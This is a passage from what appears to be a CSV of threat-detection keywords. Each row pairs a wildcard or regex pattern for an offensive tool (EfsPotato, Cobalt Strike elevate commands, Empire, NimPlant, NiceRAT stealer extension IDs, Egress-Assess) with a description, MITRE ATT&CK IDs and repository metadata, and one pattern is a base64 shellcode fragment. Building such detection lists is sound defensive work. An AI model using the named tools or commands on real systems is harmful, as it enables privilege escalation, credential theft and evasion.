Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.5.zip*",".{0,1000}EfiGuard\-v1\.5\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfsPotato-*.exe*",".{0,1000}EfsPotato\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*EfsPotato*efsrpc*",".{0,1000}EfsPotato.{0,1000}efsrpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*lsarpc*",".{0,1000}EfsPotato.{0,1000}lsarpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*lsarpc*",".{0,1000}EfsPotato.{0,1000}lsarpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*lsass*",".{0,1000}EfsPotato.{0,1000}lsass.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*netlogon*",".{0,1000}EfsPotato.{0,1000}netlogon.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*samr*",".{0,1000}EfsPotato.{0,1000}samr.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato-main*",".{0,1000}EfsPotato\-main.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EgeBalci/amber@latest*",".{0,1000}EgeBalci\/amber\@latest.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*EggShell.py*",".{0,1000}EggShell\.py.{0,1000}","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","10","1613","385","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z" "*egjidjbpglichdcondbcbdnbeeppgdph*",".{0,1000}egjidjbpglichdcondbcbdnbeeppgdph.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Egress-Assess Exfil Data*",".{0,1000}Egress\-Assess\sExfil\sData.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email subject","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess Report*",".{0,1000}Egress\-Assess\sReport.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess transfer share*",".{0,1000}Egress\-Assess\stransfer\sshare.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*EgressAssess With Attachment*",".{0,1000}EgressAssess\sWith\sAttachment.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email body","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess.*",".{0,1000}Egress\-Assess\..{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*EgressAssess.ps1*",".{0,1000}EgressAssess\.ps1.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess-master*",".{0,1000}Egress\-Assess\-master.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*egressbuster*",".{0,1000}egressbuster.{0,1000}","offensive_tool_keyword","egressbuster","EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.","T1046 - T1570 - T1590","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/trustedsec/egressbuster","1","1","N/A","N/A","4","336","102","2021-02-17T00:54:07Z","2015-05-14T02:19:26Z" "*egresscheck-framework*",".{0,1000}egresscheck\-framework.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQj*",".{0,1000}EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQj.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","calc base64 shellcode","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*eigblbgjknlfbajkfhopmcojidlgcehm*",".{0,1000}eigblbgjknlfbajkfhopmcojidlgcehm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ejabberd2john.py*",".{0,1000}ejabberd2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ejbalbakoplchlghecdalmeeeajnimhm*",".{0,1000}ejbalbakoplchlghecdalmeeeajnimhm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ejjladinnckdgjemekebdpeokbikhfci*",".{0,1000}ejjladinnckdgjemekebdpeokbikhfci.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*eKeys\*-eKeys.txt*",".{0,1000}eKeys\\.{0,1000}\-eKeys\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*eldraco/domain_analyzer*",".{0,1000}eldraco\/domain_analyzer.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*electrum2john.py*",".{0,1000}electrum2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*elevate juicypotato *",".{0,1000}elevate\sjuicypotato\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*elevate Printspoofer*",".{0,1000}elevate\sPrintspoofer.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","0","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*elevate svc-exe *",".{0,1000}elevate\ssvc\-exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ElevatePrivs*",".{0,1000}ElevatePrivs.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*elevationstation.cpp*",".{0,1000}elevationstation\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevationstation.exe*",".{0,1000}elevationstation\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevationstation.git*",".{0,1000}elevationstation\.git.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevationstation.sln*",".{0,1000}elevationstation\.sln.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevationstation-main*",".{0,1000}elevationstation\-main.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevator.exe *cmd.exe*",".{0,1000}elevator\.exe\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*ElevenPaths*FOCA*",".{0,1000}ElevenPaths.{0,1000}FOCA.{0,1000}","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","10","2752","529","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z" "*ELFLoader.c*",".{0,1000}ELFLoader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*ELFLoader.h*",".{0,1000}ELFLoader\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*ELFLoader.out*",".{0,1000}ELFLoader\.out.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*elite-proxy-finder*",".{0,1000}elite\-proxy\-finder.{0,1000}","offensive_tool_keyword","elite-proxy-finder","Finds elite anonymity (L1) HTTP proxies then tests them all in parallel. Tests each proxy against 3 IP checking URLs including one which is HTTPS to make sure it can handle HTTPS requests. Then checks the proxy headers to confirm its an elite L1 proxy that will not leak any extra info. By default the script will only print the proxy IP. request time. and country code of proxies that pass all four tests but you can see all the results including errors in any of the tests with the -a (--all) option.","T1586.001 - T1041.002 - T1105.002 - T1573.001 - T1135.002 - 